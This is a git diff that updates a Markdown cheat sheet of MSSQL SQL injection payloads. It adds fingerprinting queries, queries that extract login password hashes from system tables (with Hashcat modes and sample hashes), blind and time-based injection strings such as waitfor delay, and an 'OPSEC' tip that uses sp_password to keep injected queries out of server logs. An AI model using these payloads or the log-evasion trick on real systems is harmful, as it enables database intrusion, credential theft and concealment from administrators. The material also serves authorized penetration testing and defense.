MySQL MSSQL Oracle SQL Update

2025-12-12 15:49:38 -08:00 · 2023-04-14 17:45:45 +02:00
parent 25d2be529f
commit 6861c46fcd
4 changed files with 188 additions and 51 deletions
--- a/Injection/MSSQL
+++ b/Injection/MSSQL
@@ -2,15 +2,16 @@

 ## Summary

+* [MSSQL Default Databases](#mssql-default-databases)
 * [MSSQL Comments](#mssql-comments)
 * [MSSQL User](#mssql-user)
 * [MSSQL Version](#mssql-version)
 * [MSSQL Hostname](#mssql-hostname)
-* [MSSQL Database name](#mssql-database-name)
+* [MSSQL Database Name](#mssql-database-name)
+* [MSSQL Database Credentials](#mssql-database-credentials)
 * [MSSQL List databases](#mssql-list-databases)
 * [MSSQL List columns](#mssql-list-columns)
 * [MSSQL List tables](#mssql-list-tables)
-* [MSSQL Extract user/password](#mssql-extract-userpassword)
 * [MSSQL Union Based](#mssql-union-based)
 * [MSSQL Error Based](#mssql-error-based)
 * [MSSQL Blind Based](#mssql-blind-based)
@@ -25,12 +26,27 @@
 * [MSSQL Trusted Links](#mssql-trusted-links)
 * [MSSQL List permissions](#mssql-list-permissions)

+
+## MSSQL Default Databases
+
+| Name                  | Description                           |
+|-----------------------|---------------------------------------|
+| pubs	                | Not available on MSSQL 2005           |
+| model	                | Available in all versions             |
+| msdb	                | Available in all versions             |
+| tempdb	            | Available in all versions             |
+| northwind	            | Available in all versions             |
+| information_schema	| Availalble from MSSQL 2000 and higher |
+
+
 ## MSSQL Comments

-```sql
-- comment goes here
-/* comment goes here */
-```
+| Type                       | Description                       |
+|----------------------------|-----------------------------------|
+| `/* MSSQL Comment */`      | C-style comment                   |
+| `-- -`                     | SQL comment                       |
+| `;%00`                     | Null byte                         |
+

 ## MSSQL User

@@ -41,7 +57,7 @@ SELECT system_user;
 SELECT user;
 ```

-## MSSQL version
+## MSSQL Version

 ```sql
 SELECT @@version
@@ -51,7 +67,11 @@ SELECT @@version

 ```sql
 SELECT HOST_NAME()
-SELECT @@hostname;
+SELECT @@hostname
+SELECT @@SERVERNAME
+SELECT SERVERPROPERTY('productversion')
+SELECT SERVERPROPERTY('productlevel')
+SELECT SERVERPROPERTY('edition');
 ```

 ## MSSQL Database name
@@ -60,6 +80,22 @@ SELECT @@hostname;
 SELECT DB_NAME()
 ```

+
+## MSSQL Database Credentials
+
+* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
+    ```sql
+    SELECT name, password FROM master..sysxlogins
+    SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 
+    -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer
+    ```
+* **MSSQL 2005**: Hashcat mode 132: `0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe`
+    ```sql
+    SELECT name, password_hash FROM master.sys.sql_logins
+    SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+    ```
+
+
 ## MSSQL List databases

 ```sql
@@ -88,17 +124,6 @@ SELECT table_catalog, table_name FROM information_schema.columns
 SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimeter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options  (Only works in MSSQL 2017+)
 ```

-## MSSQL Extract user/password
-
-```sql
-MSSQL 2000:
-SELECT name, password FROM master..sysxlogins
-SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)
-
-MSSQL 2005
-SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
-```

 ## MSSQL Union Based

@@ -141,6 +166,7 @@ AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -

 AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
 AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- 
+AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'

 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

@@ -159,7 +185,8 @@ ProductID=1';waitfor delay '0:0:10'--
 ProductID=1');waitfor delay '0:0:10'--
 ProductID=1));waitfor delay '0:0:10'--

-IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'     comment:   --
+IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
+IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';
 ```

 ## MSSQL Stacked Query
@@ -325,6 +352,15 @@ Check if current user is a member of the specified server role.
 SELECT is_srvrolemember('sysadmin');
 ```

+## MSSQL OPSEC
+
+Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_password`
+
+```sql
+-- 'sp_password' was found in the text of this event.
+-- The text has been replaced with this comment for security reasons.
+```
+
 ## References

 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)